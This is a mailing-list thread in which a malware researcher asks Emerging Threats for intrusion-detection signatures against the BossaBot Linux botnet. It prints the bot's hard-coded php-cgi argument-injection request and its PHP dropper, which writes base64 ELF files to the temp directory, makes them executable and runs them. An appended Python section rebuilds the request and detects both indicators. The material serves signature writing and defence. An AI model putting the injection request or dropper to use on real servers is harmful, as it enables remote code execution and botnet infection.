
List:       emerging-sigs
Subject:    Re: [Emerging-Sigs] Request #3 - ET Signature for Linux Bossabot
From:       Will Metcalf <wmetcalf () emergingthreatspro ! com>
Date:       2014-09-22 2:02:15
Message-ID: 821E7BCD-6B0B-4156-A2D7-9DE0D7F3B794 () emergingthreatspro ! com



Rick,

We will look into everything you sent us today and try to have something out tomorrow for anything that isn't already covered. Thanks again!

Regards,

Will

> On Sep 21, 2014, at 8:09 PM, Hendrik Adrian <1@1rik.com> wrote:
> 
> Hello Will,
> CC: ..and ET friends,
> 
> There is one more request. A route of the Kaiten base code DDoS'er was recoded into an active evil botnet (IRC based); the actor called it BossaBot. Assisting Mr. Malekal Morte, I am in charge of reversing the ELF binaries, since the first time the RFI attack was spotted and the botnet was spotted in some forum.
> These are good chronological references for the threat:
> Malekal's report: http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/
> My reversing in monitoring this ELF threat: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965
> Spiderlabs posted about this threat too: http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
> 
> ...according to the posts above you will see that the threat is important to handle.
> 
> If an ET sig doesn't cover this threat yet, I would like to request an ET sig to block this RFI and the PHP infection (or "injection" is more like it). If you think you have one, please see the details below, in case anything can be improved.
> The problem with this proposal is that, since the botnet attack request can only be activated from the actor's IRC, it is a bit difficult to simulate the attack to make a good PCAP capture (I tried many times), so there is no PCAP. But we have THREE pieces of information that can be used to replace the PCAP to generate sigs, as follows:
> (1) RFI and web file injection HTTP header injected log.
> 
> The log is available here: http://pastebin.com/raw.php?i=KUTT2UQa < @undeadsecurity was doing good work in recording this (a credit)
> (2) The latest ELF binary I reversed, spotted 2 days ago, contains the below data hard coded in the bins:
> // RFI TO BE SENT HARD CODED:
> 
> .rodata:0x0408540 aPostS?2d64616c
> .rodata:0x0408540   db 'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
> .rodata:0x0408540   db '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
> .rodata:0x0408540   db 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
> .rodata:0x0408540   db '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
> .rodata:0x0408540   db '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
> .rodata:0x0408540   db '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
> .rodata:0x0408540   db '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
> .rodata:0x0408540   db '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
> .rodata:0x0408540   db '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
> .rodata:0x0408540   db '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
> .rodata:0x0408540   db '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
> .rodata:0x0408540   db '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
> .rodata:0x0408540   db '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
> .rodata:0x0408540   db '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
> .rodata:0x0408540   db '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
> .rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah
> 
> // ALSO THE ACCOMPANIED DROPPER SCRIPT
> 
> .rodata:0x0408540   db 'Host: %s',0Dh,0Ah
> .rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '
> .rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
> .rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
> .rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
> .rodata:0x0408540   db 'Connection: close',0Dh,0Ah
> .rodata:0x0408540   db 0Dh,0Ah
> .rodata:0x0408540   db '%s',0
> .rodata:0x04089D5   align 8
> 
> .rodata:0x04089D8 a?phpBufferfSBu 
> .rodata:0x04089D8   db '<?php',0Ah          ;
> .rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
> .rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
> .rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
> .rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
> .rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
> .rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
> .rodata:0x04089D8   db '{',0Ah
> .rodata:0x04089D8   db 'exit(1);',0Ah
> .rodata:0x04089D8   db '}else{',0Ah
> .rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
> .rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
> .rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
> .rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);',0Ah
> .rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);',0Ah
> .rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
> .rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
> .rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8   db 'exit(1);',0Ah
> .rodata:0x04089D8   db '}',0Ah
> .rodata:0x04089D8   db '?>',0Ah,0
> .rodata:0x0408CE9   align 10h
> 
> Using the above (1) and (2) we can use the hard coded HTTP HEADER to be blocked by ET Sigs. Moreover, there is one more vector to use for filtration (below):
> 
> (3) The injected ELF file to the /tmp directory
> 
> <?php
> $bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
> $bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';
> 
> ↑ the above "$bufferf =" and "$bufferf2 =" look like a good spot to filter. But only the new version is using this; the old version is using a different scheme (without PHP injection, but a PHP system command to wget the bins..)
> If you need more confirmation, please do not hesitate to ask.
> It will be nice if this threat can also be blocked.
> 
> Herewith I close the series of requests for ET sigs from MalwareMustDie, a total of 3 DDoS botnet signatures. Looking forward to the reply, with thanks in advance.
> Best regards always/Rick
> 
> -- 
> Hendrik Adrian / @unixfreaxjp
> PGP/MIT.EDU: RSA 2048/0xEC61AB9
> http://about.me/unixfreaxjp
> 
> MalwareMustDie,NPO Research Group
> Web http://malwaremustdie.org
> Research blog: http://malwaremustdie.blogspot.com
> Wiki & Code: http://code.google.com/p/malwaremustdie/
> Report Pastes: http://pastebin.com/u/MalwareMustDie
> 
> This email is confidential and may be legally privileged. It is intended
> as a confidential communication only for the person(s) named above.
> Any other use or disclosure is prohibited.
> If you have received this message in error, please delete it and disregard its contents.
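As an added defender's example (my code, not part of Rick's post or of any ET signature), the Python below joins the .rodata fragments from item (2) into the binary's printf template, shows the argv that php-cgi would receive from the encoded query string, and flags request lines and PHP droppers (item (3)) by the two indicators proposed above. The request path and the PHP sample are constructed; the only behaviour assumed beyond the post is the RFC 3875 rule that a query string without a raw '=' is split on '+' into command-line arguments.

```python
import base64
import re
from urllib.parse import unquote

# The 'POST %s?...' template as the binary stores it (the 16 .rodata
# fragments from the post joined, trailing CRLF dropped). '%%' is printf's '%'.
POST_TEMPLATE = (
    "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E"
    "%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6"
    "D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%"
    "6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%"
    "64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%"
    "6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%"
    "%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70"
    "%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%"
    "%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72"
    "%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6"
    "3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74"
    "%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6"
    "7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31"
    "+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6"
    "6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2"
    "D%%6E HTTP/1.1"
)

SAMPLE_PHP = ("<?php\n$bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAAA';\n"
              "$bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA';\n"
              "$note = 'aGVsbG8gd29ybGQ=';\n")  # constructed, shape of item (3)

def build_request_line(path="/index.php"):
    """printf semantics: '%%' -> '%', '%s' -> the path the bot fills in."""
    return POST_TEMPLATE % path

def cgi_argv(request_line):
    """argv a CGI server passes to php-cgi (RFC 3875 4.4): only a query with no
    raw '=' is split on '+' and decoded, hence every '=' is encoded as %3D."""
    m = re.fullmatch(r"[A-Z]+ [^\s?]*\?(\S*) HTTP/1\.[01]", request_line)
    if not m or "=" in m.group(1):
        return []
    return [unquote(p) for p in m.group(1).split("+")]

def ini_overrides(argv):
    """php.ini directives set through '-d name=value' arguments."""
    ov = {}
    for flag, val in zip(argv, argv[1:]):
        if flag == "-d" and "=" in val:
            name, value = val.split("=", 1)
            ov[name] = value
    return ov

# Overrides that turn a php-cgi request into code execution: remote includes
# on, sandboxing off, and the POST body prepended to every script.
RISKY = {"allow_url_include", "auto_prepend_file", "disable_functions",
         "open_basedir", "safe_mode"}

def is_phpcgi_arg_injection(request_line):
    """True when the query string sets any of the RISKY directives."""
    return bool(RISKY.intersection(ini_overrides(cgi_argv(request_line))))

# Item (3): the dropper keeps the ELF payload as base64 in a single-quoted PHP
# string; the ELF magic 7F 45 4C 46 always encodes to the prefix 'f0VMRg'.
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*'([A-Za-z0-9+/=]{8,})'")

def base64_elf_vars(php_source):
    """Names of PHP variables whose base64 literal decodes to an ELF header."""
    hits = []
    for var, literal in ASSIGN_RE.findall(php_source):
        try:
            head = base64.b64decode(literal[:8])  # 8 chars -> first 6 bytes
        except ValueError:
            continue
        if head.startswith(b"\x7fELF"):
            hits.append(var)
    return hits
```

Running `cgi_argv(build_request_line())` prints the ten `-d` overrides and the trailing `-n` in clear text, which is the readable form of the content a signature would match.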





_______________________________________________
Emerging-sigs mailing list
Emerging-sigs@lists.emergingthreats.net
https://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

Support Emerging Threats! Subscribe to Emerging Threats Pro http://www.emergingthreats.net



